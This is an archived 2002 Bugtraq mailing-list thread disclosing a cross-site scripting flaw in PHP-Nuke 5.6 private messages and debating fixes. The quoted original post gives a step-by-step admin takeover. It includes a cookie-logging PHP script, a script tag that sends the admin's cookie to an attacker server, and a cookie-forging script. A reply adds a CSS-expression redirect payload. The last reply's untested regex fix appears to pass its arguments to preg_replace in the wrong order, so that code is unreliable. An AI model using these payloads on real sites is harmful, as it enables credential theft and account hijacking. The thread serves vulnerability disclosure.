I think his point is this: simply invoking strip_tags doesn't prevent scripts or other harmfuls from getting through on the tags that you do allow. The PHP manual, under the function for entry for strip_tags() even notes a warning: --- Warning This function does not modify any attributes on the tags that you allow using allowable_tags, including the style and onmouseover attributes that a mischievous user may abuse when posting text that will be shown to other users. --- see http://www.php.net/manual/en/function.strip-tags.php Being able to execute arbitrary javascript in a private message would allow you to steal the cookies of the admin, though you may have to do a small amount of social engineering to get the admin to move his mouse overtop of the text inside the appropriate tag for an onMouseOver call. Besides, I believe his exploit would work exactly the same for any of the tags that you do allow. You might do better with the following code: (warning, not tested!!!!!! Haven't played with PHP nuke since version 4.something when I was defaced because of a security bug and stopped using it): $message = strip_tags($message, '<br><b><u><i>'); $string = preg_replace("'(</?[biu][r]?)[^>]*(>)'",$string,"\\1\\2"); Once again, I'll point out that this code hasn't been tested, it's been a long time since I played with PHP Nuke or regular expressions. The idea is to take the four tags that you do allow, and strip out anything between the <, optional /, tag name, and >. -MightyE www.mightye.org -----Original Message----- From: <-delusion-> [mailto:delusi0n@bellsouth.net] Sent: Thursday, August 15, 2002 9:16 PM To: bugtraq@securityfocus.com Subject: Re: PHP-Nuke v5.6 - Users can compromise admin accts. Jelmer's accusation that my proposed fix is flawed is wrong. He demonstrates a code that uses the <a> tag, if you look at my solution: $message = strip_tags($message, '<br><b><u><i>'); The <a> tag is not allowed. Only the tags <br><b><u><i> are allowed. I did talk to Jelmer and told him my solution successfully stripped the tags from his code, he replied with this message: <?php > $myText = '<a done=false STYLE="visibility : hidden; word-spacing : > expression( !(eval(this.done)) ? location.href=\'http://kuperus.xs4all.nl\' > : 0 ); word-wrap : expression(this.done=true);"> test</a>'; > $string = strip_tags($myText, '<a><b><i><u>'); <a> > echo $string > > ?> > > works on my php 4.06 He uses this string.. $string = strip_tags($myText, '<a><b><i><u>'); <a> Which allows the <a> tag. so therefore his code got executed when he ran it. it was just a mistake on Jelmer's part. If you seek a quick fix for this vuln, just use my solution. It works. -delusion http://digital-delusions.dyn.ee > On Thu, 2002-08-15 at 19:08, Jelmer wrote: > > IMHO this whole email is just stating the obvious. On top of that the > > proposed fix is flawed. > > > > The PHP strip_tags function does not strip attributes so this is possible in > > your proposed fix : > > > > <a done=false STYLE="visibility : hidden; word-spacing : expression( > > !(eval(this.done)) ? location.href='http://kuperus.xs4all.nl' : 0 ); > > word-wrap : expression(this.done=true);"> test</a> > > > > its a bit messy but gets the job done. It works by using css expressions (a > > feature afaik native to Internet explorer) in the style tag. > > > > -- > > jelmer > > > > ----- Original Message ----- > > From: "<-delusion->" <delusi0n@bellsouth.net> > > To: <bugtraq@securityfocus.com>; <webappsec@secuirtyfocus.com> > > Sent: Thursday, August 15, 2002 10:30 AM > > Subject: PHP-Nuke v5.6 - Users can compromise admin accts. > > > > > > > Tested on PHP-Nuke v5.6 with Mozilla on Linux > > > (should work on past versions and on most browsers) > > > > > > Impact: > > > --------------------------------------------- > > > Allows any user to get admin access to a PHP-Nuke site. > > > > > > Summary: > > > ---------------------------------------------- > > > Due to a XSS flaw in PHPNuke's Private Messaging module, users can send > > > messages > > > with html code that will be executed without any filtering. In old PHPNuke > > > versions > > > XSS allowed theft of cookies which stored passwords in base64 > > > encoding. Well PHPNuke version 5.6 encrypts the passwds in md5 before it > > > encodes it > > > into base64 and puts it into a cookie. This made stolen cookies useless if > > > the attacker just > > > tried decoding the base64 encrypted pass, because he just got the MD5 > > > encrypted pass. > > > > > > Since PHP Nuke encrypts passes in md5 and then matches the encrypted pass > > > with the > > > encrypted one in the database, i was able to use the md5 encrypted pass i > > > got from the > > > stolen cookie to authenticate myself. > > > > > > PHPNuke sets cookies by base64 encoding a string that looks like this: > > > > > > username:md5_encrypted_pass:lang > > > > > > Since i can get the md5_encrypted pass all i have to do is launch a script > > > that base64 encodes > > > a string like the one above, and sets it as a cookie on my box. > > > > > > Exploit: > > > ------------------------------------------------- > > > For this exploit to work, you must create the following files in your web > > > server's directory. > > > > > > cookie.php containing this: > > > <? > > > $fp = fopen("cookie.txt","a"); > > > fputs($fp, $cookie); > > > fclose($fp); > > > print "Message Not Found!"; /* this is so the admin doesnt get scared. and > > > thinks its some bug. */ > > > ?> > > > > > > test.php containing: > > > <? > > > $admin = base64_encode("decoded_string") ; > > > setcookie("admin","$admin",time()+2592000); > > > ?> > > > You will find out what to replace decoded_string with.. > > > > > > 1. Send an appealing private message to admin containing > > > > > <script>document.location.replace('http://yourserver/cookie.php?cookie='+doc > > > ument.cookie);</script> > > > > > > 2. Wait awhile until the admin checks the message then check cookie.txt on > > > yer server. > > > > > > 3. From cookie.txt.. copy the encrypted text after admin= and before the ; > > > > > > 4. go to http://www.isecurelabs.com/base64.php paste the copied text, > > click > > > decode it should give u a string like this: > > > username:md5_encrypted_passwd:language (language may be blank). > > > > > > 5. paste the decoded string into test.php like so. > > > <? > > > $admin = base64_encode("paste decoded string here"); > > > setcookie("admin","$admin",time()+2592000); > > > ?> > > > > > > 6. Login as any user on the site > > > > > > 7. send private message to self containing: > > > <iframe src="http://yerserver/test.php";></iframe> > > > Open the message and a cookie will now be set on yer box, but it will be > > > configured with your server's URL. > > > So all u gotta do is replace yer url wit the nuked site. > > > > > > 8. for mozilla edit cookies.txt in yer ~/.mozilla/someprofile/something/ > > > directory replace the url of yer server to the nuked site, > > > for other browsers just find the Cookie from your server and edit it so > > > instead of showng your url it shows the url > > > of the nuked site. > > > > > > 9. restart yer browser (close and open up again). go back into the nuked > > > site and you are now admin. :D > > > > > > Temp Solution: > > > ------------------------------------------------- > > > Edit reply.php in /modules/Private_Messages/ and make $message be stripped > > > of html tags. > > > > > > Go to line 75 in reply.php and add this line: > > > > > > $message = strip_tags($message, '<br><b><u><i>'); > > > > > > That will remove any html tags that arent <br><b><u> or <i>. So it will > > > prevent the XSS. > > > ------------------------------------------------- > > > NOTE: I wasnt able to contact the php nuke person, i couldnt find an email > > > on their site, and when i signed up for membership i never got the > > password, > > > so if u can, let them know asap so they can fix this. > > > > > > Another Vulnerability Brought to you by, > > > delusion > > > http://digital-delusions.dyn.ee > > > > > > > > > > > > > > > > >
